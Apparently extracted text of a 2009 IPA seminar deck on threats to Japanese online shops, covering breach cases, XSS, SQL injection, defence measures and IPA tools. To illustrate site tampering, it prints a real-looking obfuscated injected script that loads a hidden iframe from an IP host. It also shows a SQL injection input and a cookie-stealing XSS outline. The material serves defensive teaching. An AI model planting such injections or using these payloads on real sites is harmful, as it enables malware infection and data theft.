1. 今 何が起こっているのか? 1.1 インターネットを取り巻く状況は? 1.2 ウェブアプリケーションの脆弱性 1.3 ウェブサイト形態と対応責任 2. 脆弱性の解説 3. ウェブサイトのセキュリティ対策方針 4. セキュリティ対策ツールの紹介 Copyright 2009 独立行政法人情報処理

ネット通販セキュリティ対策セミナー

ネット通販サイトにおける脅威と対策方針

～近年の脅威やその対策方針、セキュリティ対策ツールの紹介など～

独立行政法人 情報処理推進機構

セキュリティセンター

１．今、何が起こっているのか？

1.1 インターネットを取り巻く状況は？

1.2 ウェブアプリケーションの脆弱性

1.3 ウェブサイト形態と対応責任

２．脆弱性の解説

３．ウェブサイトのセキュリティ対策方針

４．セキュリティ対策ツールの紹介

1.1 インターネットを取り巻く状況は？

恐ろしい状況の前に、

まずはネット通販の特色から。

z本日お越しの皆様は、今インターネット上で

ネット通販の利便性

zインターネットを利用した通信販売は、

新鮮

な情報をいち早く掲載

でき、

柔軟な価格設定

やキャンペーン等の

販促も手軽

に実施可能

で、また利用者登録により利用者への利便

性も上げられ、従来の通信販売と比べ飛躍

的に

営業効率

を上げられる。

zこのようなメリットから、どれだけ売上げを上

げられるか「成功の秘訣」「効果的な広告掲

載」「購買分析」など

デザインや表現を重視

し

たウェブサイトを開発する事になる。

ネット通販における考慮など

zこれらの考えは事業発展における重要な

ファクターである。

zもちろん「ネット通販における規制」や「広告

メールに関する規制」など各種

規制関連

は

対策

され守られるものである。

zまたクレーム対策などの

ノウハウは蓄積

され

ている。

しかし、次の問題は解決されているか？

インターネット上の被害例

（その１）

z価格情報提供サイト

2005年5月、 ウェブサイトに不正なプログラムが

仕掛けられ、閲覧したユーザがウイルスに感染

したという事を発表。

ウェブサイトのプログラムを直すそばから何者か

により改ざんされていった。その後攻撃の頻度

が急増しサイトを閉鎖。（

_{10日間の閉鎖）}

登録ユーザのメールアドレス

_{2万2511件漏えい。}

5月の月間PVは、前月比で約4割減。

取引業者への影響大。

インターネット上の被害例

（その２）

z音響機器・楽器通販サイト

2008年4月、

サイバー攻撃により顧客情報が

10 万件弱流出

した可能性がある事を発表。

クレジットカード情報が不正利用され、

2008年3月にカード会社が検知し判明。

セキュリティ会社の調査により、

_{2006年6月頃に}

最初の不正侵入があった事が判明。

会員

_12万2884人

に

_1000円

を次回購入時割引。

セキュリティ会社への作業依頼とサーバ交換等

で

_{6,000万円強の費用}

をかけた対策を行った。

インターネット上の被害例

z 他にもインターネット通販サイト等に、多くの被害が

取り沙汰されている。

•

クレジットカード番号や個人情報の漏えい

–

健康食品や医薬品販売サイト

–

化粧品販売サイト

–

雑貨販売サイト

–

釣具・アウトドア用品販売サイト

•

ウイルス感染などを引き起こすウェブサイトの改ざん

–

ウイルス対策ソフト開発会社

–

自動車情報サイト

–

政府関連のウェブサイト

–

家庭用ゲーム会社のウェブサイト（米国）

など

これは代表的な

内容であり、毎日

のようにホーム

ページが攻撃され

被害が出ている。

ネット通販をとりまく脅威

(*1)

z フィッシングサイト（

別ドメイン利用

、脆弱性利用）

偽情報の表示

カード番号やパスワード等の情報漏えい

z 他人へ「なりすまし」

商品の購入

z

DB

(*2)

_{に蓄積された非公開情報の閲覧}

重要（個人）情報漏えい

z

DB に蓄積された情報の改ざん、消去

偽情報の表示、パスワード変更、システム停止

ウイルス感染サイト化

(*1)

_{脅威とは、被害に繋がるような状態。}

(*2)

_{DB（データベース）：関連し合うデータを収集・整理して、検索や更新を効率化したファイル。}

脆弱性による脅威

これらの脅威は、ウェブアプリケーションに脆弱性が

存在する事が原因で、その脆弱性を悪者が利用し

攻撃した事によるものです。

フィッシングサイト（脆弱性利用）

なりすまし

クロスサイト・スクリプティングの脆弱性

DB に蓄積された

・非公開情報の閲覧

・情報の改ざん、消去

SQL

インジェクションの脆弱性

1.2 ウェブアプリケーションの脆弱性

z本日のセミナーでは、最近大きな被害に繋が

っている

ウェブアプリケーション

の

脆弱性

そもそも脆弱性ってなに？

z 脆弱性（ぜいじゃくせい）とは

¾ コンピュータ不正アクセスやコンピュータウイルスなどの攻撃により、

その

機能や性能を損なう原因

となり得る

セキュリティ上の問題箇所

のこと

（出典：情報セキュリティ早期警戒パートナーシップガイドライン）

z 脆弱性を利用すると

¾ 問題点箇所を巧みに悪用し、コンピュータの内部データ（情報）を

盗んだり、書き換えたり、削除したり、また他のコンピュータへの

同様の悪事を働くことが可能となる

（これが

不正アクセス

であり、プログラム化して自動的に動作するの

が

ウイルス

や

ボット

である）

z 脆弱性対策は根本的なセキュリティ対策

¾ セキュリティ対策としてウイルスなどの対策も十分必要だが、脆弱性

を無くすことが最も重要！！

要は、第三者

からの攻撃

zウェブページは2つのタイプに分けられる。

静的ページ

•

いつ見ても変わらぬ内容を表示（画像やテキスト文字等）

•

静的なコンテンツをウェブサーバが表示する

動的ページ

•

入力された内容を元に

DB へ問合せ、必要な情報を取得

し、それを元にウェブページを生成し表示する

•

利用者が入力した内容を確認するページなどが該当

•

SNS、ブログ、電子掲示板、ショッピングカートなど

ウェブアプリケーションとは？

z動的ページを作りだすプログラムが

ウェブアプリケーション。

1.3 ウェブサイト形態と対応責任

z代表的な通販サイトの形態と脆弱性対応責任

N

o

サイト形態

形態概要

脆弱性の可能性

脆弱性対応責任

１ オーサリングツー

ル利用

ウェブページ作成ソフトウェア

製品

を使い、自分でホーム

ページを作成する方法。

ウェブページ作成用サンプルプログ

ラムや、機能モジュールに脆弱性。

製品の脆弱性は

製品開発者

に対応責

任があるが、

サイト運営者

として最新版

製品を入手し、サイトに反映させる責任

がある。

２ ポータルサイト構

築ソフトウェア製

品利用

ショッピングカート、電子掲示

板、ブログ、Wiki 等の

ウェブ

アプリケーションソフトウェア

製品

（CMS等）を使う方法。

•製品そのものが抱える脆弱性。

•独自でカスタマイズし利用する事も

あり、カスタマイズ部分に脆弱性が

発生する可能性あり。

•製品の脆弱性の場合は No1 の対応責

任と同様

•独自の場合は

サイト運営者

の責任で対

処する。

３ 独自開発のうえ利

用

機能やデザインを独自なもの

とする為、

自社や委託先で

ウェブアプリケーションを開発

し、それを使う方法。

脆弱性が発生する可能性あり。

セキュリティを十分考慮した設計・

開発がなされていないと、その可能

性が高い。

自社開発であれ委託開発であれ、

サイト

運営者

に対応責任がある。

４

ISP 提供サービス

利用

ISP が CMS や DB 等を活

用し、「簡単ホームページ作

成」と言うような

サービスを提

供

。それを使う方法。

ISP はウェブアプリケーションソフト

ウェア製品を利用しており、製品に

脆弱性が発見される可能性あり。

•ISP が製品の管理まで行う場合は

ISP

が対応。

•ISP は製品のインストールまでで、後の

対応は

サイト運営者

責任のケースもある。

５ ショッピングモール

等のサービスを利

用

ショッピングモール

で提供し

ている、支払決済や配送など

も含めたショッピング機能を

使う方法。

ショッピングモールで利用している

ウェブアプリケーションソフトウェア

（独自開発やソフトウェア製品）に

脆弱性が発見される可能性あり。

•ショッピングモール

が対応。

対応責任を踏まえた

サイト運営者の役割

z 自社（委託を含む）責任の場合

脆弱性

の原理や対策方法の

理解

、および

対策

。

委託発注時にセキュリティ要件を盛込む。

委託契約内容の確認（脆弱性発生時の保守など）

z 製品開発者責任の場合

製品仕様の確認（脆弱性なのか機能が不十分なのか）

製品開発者への脆弱性報告（後述のパートナーシップを利用）

製品が

対策された時点

で、サイト運営者が

サイトに反映

させる。

z サービス提供者責任の場合（ISPやモールなど）

サービス規定の確認（脆弱性等不具合への対応責任）

サービス

提供者への連絡

１．今、何が起こっているのか？

２．脆弱性の解説

2.1 情報セキュリティ早期警戒パートナーシップ

2.2 脆弱性関連情報の届出状況

2.3 クロスサイト･スクリプティング

2.4 SQLインジェクション

３．ウェブサイトのセキュリティ対策方針

４．セキュリティ対策ツールの紹介

z 脆弱性情報を適切に流通させるために

¾ 不適切な脆弱性の公開による問題は実際に発生しており、それを解決させる

ために

2004年7月経済産業省告示

「ソフトウエア等脆弱性関連情報取扱基準」

が制定された。これを踏まえ、IPA・JPCERT/CCなど6団体から、脆弱性関連

情報の適切な流通により、コンピュータ不正アクセス、コンピュータウイルスな

どによる被害発生を抑制するために、関係者に推奨する行為をとりまとめた

「情報セキュリティ早期警戒パートナーシップガイドライン」

が公表された。

2.1 情報セキュリティ早期警戒

パートナーシップ

（脆弱性関連情報の届出制度）

【受付分析機関】

【調整機関】

脆弱 性関 連 情 報 届出 脆弱 性関 連 情 報 通知 対応状況の集約 公表日調整等

z 届出累計が

5,000 件を突破！

¾ 脅威的な届出件数

届出開始から約

4 年間で 2,045 件、ここ 1 年間で 3,206 件

1日に平均 4.6件の届出

（最大

142件/日、2008年11月7日）

2.2 脆弱性関連情報の届出状況

脆弱性関連情報の届出件数の四半期別推移

ウェブサイト脆弱性届出の

種類別内訳

z ウェブサイト脆弱性の

種類は「クロスサイト・スクリプ

ティング」と「

_{SQLインジェクション」が約6割を占める}

ウェブサイトの脆弱性として

IPA に届けられ受理した 4,235 件の内訳

～ 届出開始から2009年第１四半期（2009年3月末）まで ～

2.3 クロスサイト･スクリプティング

能動的攻撃

z攻撃者は、直接サーバなどを攻撃す

る。

zイントラネット内への攻撃は難しい。

z攻撃される側の行動は不要で、いつ

でも攻撃可能。

受動的（誘導型）攻撃

z攻撃者は、利用者が特定の行動をと

るよう

誘導する

。

zFW で通信を許可している、ウェブやメー

ル等を利用した攻撃。

zイントラネット内のシステムの攻撃に、

よく用いられる。

○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■

誘導型攻撃のイメージ

z 近年のネットワーク環境の変化により、多くのネット

ワークにファイアウォールの導入が進んだ

z 個人のような小規模なネットワークであっても、

「

_{Windows ファイアウォール」のように、OS に標準}

搭載されたファイアウォールが機能するようになった

z利用者が

罠のウェブページやメールを

閲覧することで、成立する攻撃

に移行

「誘導型」攻撃が増えた背景

迷惑メール経由の攻撃例

「誘導型」攻撃のイメージ

ａ） 書かれているリンク先は、人気動画サイトのURLに見せ

かけているが、実際のリンク先はウイルスが埋め込まれてい

るウェブサイト

ｂ） ここをクリックすると、ウイルスがダウンロードされる！

利用者

ウェブサーバ

検索キーワード

IPA

利用者

検索キーワード

<s>IPA</s>

ウェブサーバ

<s>は、取り消し線

を引くHTMLタグ

<html>

【IPA 】を含む検索結果

…</html>

IPA

<html>

【

<s>IPA</s>

】を含む

検索結果

…

</html>

<s>IPA</s>

"

<

"

および

"

>

"

が出力され、

HTMLタグ

として

認識されてしまう （表示が崩れる）

【IPA】を含む

検索結果

【IPA】を含む

検索結果

①

②

③

①’

②’

③’

クロスサイト・スクリプティングの動作

（その１）

一般利用者

【

<script>…document.

cookie

…

</script>

】を

含む検索結果

脆弱なウェブサーバ

へのリンク（悪意の

スクリプトを含む）

悪意のある

ウェブサーバ

ウェブサーバ

・ウェブページに好きな文章等を表示させる（ページ改ざん）

・ブラウザ上からは見えない命令を書き込み、情報を盗む

悪意のあるウェブサーバに

セッションCookie をこっそり

送信するようなスクリプト

スクリプトがページ内に

書き込まれる

<script>…

document.cookie…</script>

スクリプト実行

【】を含む

検索結果

①

②

③

④

⑤

⑥

検索キーワード

セッションIDや

Cookie

クロスサイト・スクリプティングの動作

（その２）

2.4 SQLインジェクション

○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ○○○○ ○○○○○○○○ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■■■■■■■■■ ■■■■■■ http://△△△.or.jp/ http://▼▼▼.ne.jp/ http://○○○.co.jp/

SQL インジェクション攻撃による、ウイルス感染イメージ

ウェブサイトへの攻撃が増えた背景

z

2006 年に出現した

MPack

や

IcePack

などの

ウェブサイト攻撃ツールによって攻略される

¾ウェブサーバやウェブアプリケーションの複数の

脆弱性を自動的に攻撃する機能や管理機能を備え、

販売されている。

●

攻撃対象のサイトへ

罠サイトへ誘導する

仕組みを埋め込む。

●

サポートが充実。

頻繁にアップデートも。

●

各種ウイルス対策ソフトに

検出されない旨をアピール

●

価格（元を日本円換算）

1ヶ月： 6,000円

2ヶ月：15,000円

4ヶ月：30,000円

6ヶ月：45,000円

中国では決して安くない。

●

しかしこのソフトにも

脆弱性が存在。

(^_^;)

認証が回避可能な

裏ツールも出回る。

ファイル形式

攻撃対象の脆弱性

攻撃先 URL

オプション

会員認証

サポート先

z

2006 年に出現した

MPack

や

IcePack

などの

ウェブサイト攻撃ツールによって攻略される

¾ウェブサーバやウェブアプリケーションの複数の

脆弱性を自動的に攻撃する機能や管理機能を備え、

販売されている。

zウェブサイトの改ざんは、他の攻撃と同様、目に

見えない形で行われる傾向がある

¾

インラインフレームやスクリプトなどといった、不可視

の状態でウェブサイトに挿入できるものが混入される

ため、利用者がウェブブラウザから閲覧しただけでは

違いが全く判らない。

ウェブサイトの改ざん例

<iframe src='http://url' width='1' height='1' style='visibility:

hidden;'></iframe><script>function

v4760be4c05e00(v4760be4c065f7){ function v4760be4c06def () {return 16;}

return(parseInt(v4760be4c065f7,v4760be4c06def()));}function

v4760be4c07de0(v4760be4c081dc){ var

v4760be4c085d9='';for(v4760be4c089d5=0;

v4760be4c089d5<v4760be4c081dc.length;

v4760be4c089d5+=2){ v4760be4c085d9+=(String.fromCharCode(v4760be4

c05e00(v4760be4c081dc.substr(v4760be4c089d5, 2))));}return

v4760be4c085d9;}

document.write(v4760be4c07de0('3C5343524950543E77696E646F772E73

74617475733D27446F6E65273B646F63756D656E742E777269746528273

C696672616D65206E616D653D3735393830313431207372633D5C276874

74703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746

D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292

A313632353235292B27663865656666625C272077696474683D353931206

865696768743D323735207374796C653D5C27646973706C61793A206E6F

6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

SQLインジェクションの動作

ウェブサーバ

＋

ウェブアプリ

データベース

ID john

user

johnの情報

SELECT * FROM user WHERE id=‘$ID’

SQL文例

SELECT * FROM user

WHERE id= ‘ john '

john

一般利用者

悪意を持つ人

ID john ’ or ‘A’=‘A

全てのユーザ

の情報

SELECT * FROM user

WHERE id= ‘ john’ or ‘A’=‘A '

john’ or ‘A’=‘A

「全て」を意味する

・データベースから重要な情報が盗まれてしまう

①

②

③

④

①’

②’

③’

④’

SQLインジェクションの攻撃傾向

出典：株式会社ラック 「SQLインジェクション攻撃検知（2009年2月まで）」より

http://www.lac.co.jp/info/alert/alert20090303.html

１．今、何が起こっているのか？

２．脆弱性の解説

３．ウェブサイトのセキュリティ対策方針

3.1 ネット通販における他の脅威と対策

3.2 セキュリティ確保のための基本対策

４．セキュリティ対策ツールの紹介

3.1 ネット通販における他の脅威と対策

zウェブアプリケーションの脆弱性以外にも

脅威は存在する。

紙媒体・記録媒体（

USB，CD‥）等の紛失・盗難

メール等の誤送信

マネジメント的対策（ポリシー・ルールの策定と運用）

技術的対策（接続装置の制御、記憶媒体の暗号化）

ウイルス・ワーム感染

ウイルス対策ソフトの利用

ウェブサーバの設定ミスなど不適切な運用

サーバの要塞化

通信の盗聴

SSLなどの暗号化通信

3.2 セキュリティ確保のための基本対策

セキュアなウェブサイトを構築・維持するためには、全体を見通し

た

出来るだけ漏れがない

対策を、

組織的に実施

することが重要。

„セキュリティ予算確保

„開発の委託

„セキュアな開発

„適切なサーバ構築

„

ID・パスワードの強化

„設定情報のバックアップ・ログ収集

„セキュリティ対策機器の導入・監視

„セキュリティ監査

„セキュリティ事故発生を想定した体制作りと運用

„セキュリティメンテナンス

製 サ

製 サ

製 サ

製 サ

この基本対策は、自社でウェブサイトを

構築管理している事を対象としている。

ソフトウェア製品利用時には ⇒

サービス利用時には

⇒

製

サ

セキュリティ予算確保

zセキュリティ確保のために予算化

ウェブサイト運営にはセキュリティ対策の責任がある。

セキュリティ対策や維持には

相応の費用

が必要。

•

脆弱性を作り込まぬために必要な費用

•

セキュリティは時間と共に強度が低下するため維持する費用

ウェブサイト運営の企画段階から開発や運用に必要な

セキュリティ予算を検討し確保

する。

z上司や予算担当者への説得

セキュリティ対策の重要性と必要費用を説明。

セキュリティ対策は費用対効果が計りづらいものだが、安全

性を訴えた積極的なサイト運営を特色とするのも手ではない

か。

製 サ

開発の委託

zセキュリティ発注要件の必要性

従来の開発では、契約上セキュリティに関する要件は十分

な内容ではなかった。

その結果、脆弱性のようなセキュリティに関する問題が発覚

しても、委託側・受注側ともに不幸な結果を招く事が多い。

特に委託側に新たな費用を必要とする傾向がある。

zセキュリティ要件を盛り込む

瑕疵担保契約にて責任を明確する。

発注仕様や要求仕様に

具体的な要求仕様を盛り込む

。

http://www.jnsa.org/active/2005/active2005_1_4a.html

¾ 参考：JNSAセキュアシステム開発ガイドライン

「

Webシステム セキュリティ要求仕様（RFP）」編 β版

セキュアな開発

セキュリティを確保したウェブアプリケーションの

開発にはセキュリティ（脆弱性）の知識が必須。

自社で開発する上では

十分理解

する必要がある。

z脆弱性の理解

脅威の仕組みや問題の原因を正しく理解する。

•

「知っていますか？脆弱性（ぜいじゃくせい）」

z安全なプログラミング

安全にプログラムを作成する知識を身に付ける。

•

「安全なウェブサイトの作り方」

•

「セキュア・プログラミング講座」

zセキュリティを考慮したシステム構成

ネットワークセグメントの分離

•

外部セグメント、

DMZ

（非武装地帯）

の設置、内部セグメント

zサーバ要塞化

最小構成

•

不要なサービスの停止

•

不要なアプリケーションの削除

最新のソフトウェア構成

アクセスコントロール設定

•

職務に応じた適切なアクセス権

適切なサーバ構築

インター ネット ファイアウォール ウェブサーバ メールサーバ DNSサーバ DBサーバ DMZ 内部セグメント 外部 セグメント

ID・パスワードの強化

zパスワード管理を徹底

不要なアカウントの削除

辞書に載っている文字列は使わない

長くて複雑なパスワード設定

（英字＋数字＋記号）

z

SSH 接続を使う場合

公開鍵認証方式を利用

パスワードをどうしても利用する場合は徹底管理

製 サ

設定情報のバックアップ・ログ収集

z 正常時の設定情報などを保管

¾各サーバ設定内容、変更記録、作業手順など

¾とにかく

資料を残す

。画面キャプチャーでも可。

z 必要なログ

UNIX系OS

¾ログイン・ログアウト、プロセスの起動・終了、コマンド実行など

Windows系OS

¾ログオン・ログオフ、アプリケーションの起動と停止、システム設定の

変更、各種イベントの発生状況など

Webサーバ

¾各クライアントからのアクセス履歴、エラーログなど

z ログ解析の警告メールの自動送信化。NTP時刻同期。

セキュリティ対策機器の導入・監視

z ファイアウォール

内部から外部への不要な通信を許可している場合が多い。

z

IDS

（侵入検知システム）

／

IPS

（侵入防止システム）

IDSは通信回線を監視しネットワークへの

侵入を検知

して管理者に通報

するシステム。IPSはIDSの機能を拡張し、侵入を検知したら

接続の遮断

などの防御をリアルタイムに行なう機能を持つ。

z

WAF

（

Web Application Firewall）

IDS/IPS ではパケットの中身に危険なコードが含まれていても中身までは

解析できないことがあるが、WAF ではパケットの中身までを解析し、

危険

なコードをブロック

することができる。

z リアルタイム監視

これらのセキュリティ対策機器を利用し、発生した警告をすぐさま察知し、

問題の

通信を瞬時に防ぐ事が大切

である。

•

24時間365日対応できるエキスパートを自社雇う若しくは育てる。

•

専門のセキュリティベンダーに任せる。

（餅は餅屋）

IDS/IPS ファイアウォール WAF _サーバ FW・IDS/IPS・WAFの設置と防御のイメージ

セキュリティ検査

zセキュリティ検査、ウェブアプリケーション検査

ウェブサイト公開にあたり十分なセキュリティ対策が行われ

ているか、

第三者からの検査

にて問題点を確認し、問題が

あれば対処のうえ公開する。

時間とともに新たな脆弱性が発見されるので、

定期的

な検

査も重要。

z情報セキュリティ監査企業台帳

情報セキュリティ監査をサービスとして行う主体を登録

z情報セキュリティ対策ベンチマーク

組織のセキュリティ対策状況を自ら評価するための自己診

断ツール

【参考】情報セキュリティ監査企業台帳

【参考】

情報セキュリティ対策ベンチマーク

【参考】

PCI DSS

（Payment Card Industry Data Security Standard）

z

PCI DSSは、クレジット決済サービスに携わる事業者の間で、

クレジットカード情報や

決済情報

を保護するための基準を共通化することを目的とした、

情報セキュリティ基

準

である。

z

PCI DSSは、国際ペイメントブランド5社（Visa, Master, American Express, Diners,

JCB）が共同で設立した機関であるPCI SSC（Security Standards Council）が2006

年

9月から策定・運用しているもので、

事実上の世界標準

となりつつある。

z

PCI DSSの

規程

は、「安全なネットワークの構築と維持」や「脆弱性管理プログラム

の整備」などの6分野を対象とし、「ファイアウォールをインストールして構成を維持す

ること」や「アンチウィルスソフトウェアまたはプログラムを使用し、定期的に更新する

こと」など、合計で

12の要件

を定めている。要件は

具体的に記載

されており、解釈の

違いが起こりにくくなっている。

z クレジット決済事業者はPCI DSSへの準拠が義務化されつつある。義務化される時

期やその内容は、国や事業者の規模等によって異なる。

日本の大規模店舗

の場合、

あるペイメントブランド

において

2010年9月30日に

義務化される見込み

であり、他の

ネットショップ事業者、決済代行事業者などにおいても対応が必要と見込まれる。

セキュリティ事故発生を想定した

体制作りと運用

zセキュリティ事故が起こると、被害はその会社

だけに留まらず、取引先や関係者にも大きな影

響を与える。

z事故が起きる前に、事故対応の準備が必要。

z社内体制の確立

役割分担の決定（特に責任者）

連絡経路の整備

z運用手順書などの作成

z模擬訓練

製 サ

セキュリティメンテナンス

z情報収集と対策の実施

脆弱性は日々発見されるので、

_{OSやソフトウェアの開発者}

から提供される脆弱性情報を継続的に入手し、ソフトウェア

の更新や問題の回避が必要。

z日頃の情報収集

JVN 、 JVN iPedia 、 MyJVN 、 IPA

利用製品ベンダーの

_HP

各種

_ML

ニュースサイト

zセキュリティパッチの検証環境

テスト系サーバの確保

製 サ

【参考】脆弱性対策情報ポータルサイト

＆

データベース

JVN（Japan Vulnerability Notes）

＆

JVN iPedia

JVN

_JVN

http://jvn.jp/

製品開発者と調整した

脆弱性対策情報を

タイムリーに公開

JVN iPedia

http://jvndb.jvn.jp/

国内で利用されている

製品を対象にした脆弱性

対策情報を網羅し蓄積

JVN iPedia

１．今、何が起こっているのか？

２．脆弱性の解説

３．ウェブサイトのセキュリティ対策方針

４．セキュリティ対策ツールの紹介

4.1 情報セキュリティ対策ツール情報

4.2 iLogScanner

4.3 ウェブサイト運営者のための脆弱性対応ガイド

4.4 安全なウェブサイト運営入門

4.1 情報セキュリティ対策ツール情報

その１

http://www.ipa.go.jp/security/vuln/vuln_contents/

z

「知っていますか？脆弱性（ぜいじゃくせい）」

アニメで見るウェブサイトの脅威と仕組み

-http://www.ipa.go.jp/security/awareness/vendor/programmingv2/

z

新版「セキュア・プログラミング講座」

脆弱性の理解

脆弱性を作らないために

http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

z

「安全なウェブサイトの作り方 改訂第

3版」

z

ウェブサイトの脆弱性検出ツール

iLogScanner

z

ウェブサイト運営者のための脆弱性対応ガイド

脆弱性攻撃の状況把握

脆弱性が発見されたら

z

「安全なウェブサイト運営入門」－７つの事件を体験し、ウェブサイトを守り抜け！－

ウェブサイトの事件を体験

z

リモートアクセス環境におけるセキュリティ

z

不正アクセスに関する届出

4.1 情報セキュリティ対策ツール情報

その２

z

電子メールの安全性を高める技術の利用法

z

大企業・中堅企業情報システムのセキュリティ対策 ～脅威と対策～

電子メールのセキュリティ

企業向けセキュリティ対策

z

小規模企業のための情報セキュリティ対策

http://www.ipa.go.jp/security/fy18/reports/contents/

リモートアクセス

不正アクセスの被害を受けたら

http://www.ipa.go.jp/security/ciadr/

4.2 iLogScanner

（ウェブサイトの脆弱性検出ツール）

z自前でウェブサイトを構築している運営者

どれほどの攻撃を受けているか、攻撃による

被害が発生していないか、常に状況を把握し

対策を検討する必要がある。

z攻撃の状況を確認するためには、特別な

スキルが必要

自前でセキュリティ技術者の育成や、有償の

セキュリティ監視サービスを受ける必要がある。

一般のサイト運営者が簡単に確認できない。

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner

（ウェブサイトの脆弱性検出ツール）

z「iLogScanner」がウェブサイトのアクセス

ログを解析。

ウェブサイトへの攻撃痕跡を確認可能。

一部の痕跡に関しては、攻撃が成功した

可能性を確認可能。

zただし

iLogScanner は簡易ツール

攻撃と思われる痕跡を全て網羅し、確実に

検出するものではない。誤検出もあり得る。

iLogScannerで攻撃が検出された場合、

セキュリティベンダーへの相談をお勧め。

過信は禁物

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner

（ウェブサイトの脆弱性検出ツール）

(*1) OSコマンド・インジェクションとは、Webサーバ上の任意のOSコマンドが実行されてしまう問題です。これにより、

Webサーバを不正に操作され、重要情報などが盗まれたり、攻撃の踏み台に悪用される場合があります。

(*2) ディレクトリ・トラバーサルとは、相対パス記法を利用して、管理者が意図していないWebサーバ上のファイルや

ディレクトリにアクセスされたり、アプリケーションを実行される問題です。これらにより、本来公開を意図しないファイルが

読み出され、重要情報が盗まれたり、不正にアプリケーションを実行されファイルが破壊されるなどの危険があります。

(*3) その他（IDS回避を目的とした攻撃）とは、１６進コード、親パス等の特殊文字を使用して偽装した攻撃用文字列で

攻撃が行われることによりアプリケーションの妥当性チェック機構を迂回し、SQLインジェクション、クロスサイトスクリプ

ティング等の攻撃を行うことを狙ったものです。また、ワームなどが悪用するWebサーバの脆弱性を突いた攻撃でも、

このような特殊文字が使われます。それぞれの攻撃に応じた対策が必要になります。

脆弱性の種類

攻撃と思われる

痕跡

攻撃が成功し可能性が

高いと思われる痕跡

SQLインジェクション

○

○

クロスサイト・スクリプティング

○

－

OSコマンド・インジェクション

(*1)

_○

_－

ディレクトリ・トラバーサル

(*2)

_○

_－

その他（

IDS回避を目的とした攻撃）

(*3)

_○

_－

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner

（ウェブサイトの脆弱性検出ツール）

z検出環境

4.2 iLogScanner

（ウェブサイトの脆弱性検出ツール）

z解析結果ログ表示

4.2 iLogScanner

（ウェブサイトの脆弱性検出ツール）

z解析結果サマリー表示

4.3 ウェブサイト運営者のための

脆弱性対応ガイド

zもしも脆弱性が発見されたらどうします？

対応方法の手引き

zガイドの構成

脆弱性や修正に関する基本的な知識。

脆弱性を放置することの問題。

外部から脆弱性の存在を指摘された場合

どうするべきか。

具体的な脆弱性の確認・修正の作業手順、など。

http://www.ipa.go.jp/security/ciadr/vuln_website_guide.pdf

4.3 ウェブサイト運営者のための

脆弱性対応ガイド

1. ウェブサイトの危険性

1.1. 背景

1.2. ウェブサイトで起こるトラブル

1.3. 運営者に問われる責任

1.4. 本資料の目的

2. ウェブサイトに必要な対策

2.1. トラブルの原因となる脆弱性

2.2. 求められる継続的な対策

2.3. 対策実施にあたり理解すべきこと

3. ウェブサイトに脆弱性が見つかった場合

3.1. 脆弱性をどのように見つけるか

3.2. IPA から脆弱性に関する連絡を受けた

場合

3.3. 対応は意思決定から始まる

4. ウェブサイト運営者のための脆弱性対応

マニュアル

4.1. 対応の全体に係る留意点

4.2. 脆弱性に関する通知の受領

4.3. セキュリティ上の問題の有無に関する

調査

4.4. 影響と対策の方向性の検討

4.5. 対策作業に関する計画

4.6. 対策の実施

4.7. 修正完了の報告

4.8. その他

付録：脆弱性について通知を受けた場合の

作業 チェックリスト

zガイドの内容

4.4 安全なウェブサイト運営入門

セキュリティ対策は経営的に

コストとしか考えられていない。

積極的な経営戦略と

捉えるべき。

しかし現実には、痛い目を

見ないと、動こうとしない。

お金を使おうとしない。

「攻撃されるしかない」

「やられるしかない」

と考えがち。

それじゃぁいけないだろう。

事故起こしてからでは遅い。

擬似的に

事故

を

体験

し脅威を理解させられ

ないか。自分の意志で

対応を選択するゲー

ムのような。

面白く、わかりやすい

教材はないか。

このような

コンセプト

から生まれ

たのが．．．

4.4 安全なウェブサイト運営入門

７つのインシデント

1. 電子メールの誤送信

2. クロスサイト・スクリプティング

3. SSLサーバ証明書の

期限切れ

4. ウイルス感染

5. サービス運用妨害

6. セッション管理の不備

7. SQLインジェクション

・非技術者でも分かり易いよう心掛けた内容や言葉遣い。

難しい専門用語にはルビで説明。

・各章の終わりで、寄り道として補足コンテンツが有り。

話を振り返り正しい対策論、その脅威の数字的なダメージなどを学ぶ事も可能。

結果でシナリオが変化、会社の経営に影響も！

結果の積重ねでサイトの評判に影響し売上にも影響。引いては会社の経営にも影響。

最悪会社が危機的状況に！上手く行けば事業拡大、分社化しプレイヤーが本部長に。

問題の対策をプレイヤーが選択

お客様からの問合せ殺到・・・

インシデント発生！

ショッピングサイト運営中の主人公に

…

主人公がｲﾝﾀｰﾈｯﾄショッピングサイト責任者に！

プレイヤーが主人公として７つのセキュリティ事故を体験し対応する

4.4 安全なウェブサイト運営入門

zニュースサイト記事やブログで評判

メディアや体験者からの評判は良好！

記事

：

INTERNET Watch、Security NEXT、ZDNet Japan、Itmedia

レビュー

： 夕刊フジ、@IT、Slashdot、EnterpriseZine、CodeZine、RBB TODAY、マイコミジャーナル

セキュリティやWebサイト運営の基礎的な内容から解説されているそうなので、入門用教材として良いかと思わ

れます。（出典：Slashdot ）

選択肢についてはさほど難しく感じることは少なかった。しかし、実際に、自らの運営するWebサイトにセキュリ

ティ事件が発生した場合、このような冷静な判断ができるであろうか?

(中略)

本ソフトでは、あえて「正しくない」選択をした場合にどのような結末を迎えるのか、それを読むのも有意義である

と思う。

(中略)

本ソフトの最後に「

商品と同様に安全を売るショップということでも注目を集めた

」という台詞がある。これこそが

ネットショップに、

今、求められるものではないだろうか。

（出典：マイコミジャーナル）

ブログ

：30 以上ものブログで評価

「このようなゲーム感覚でセキュリティについて学ぶというのは、

より実践的な経験を積むことができる

ので、セキ

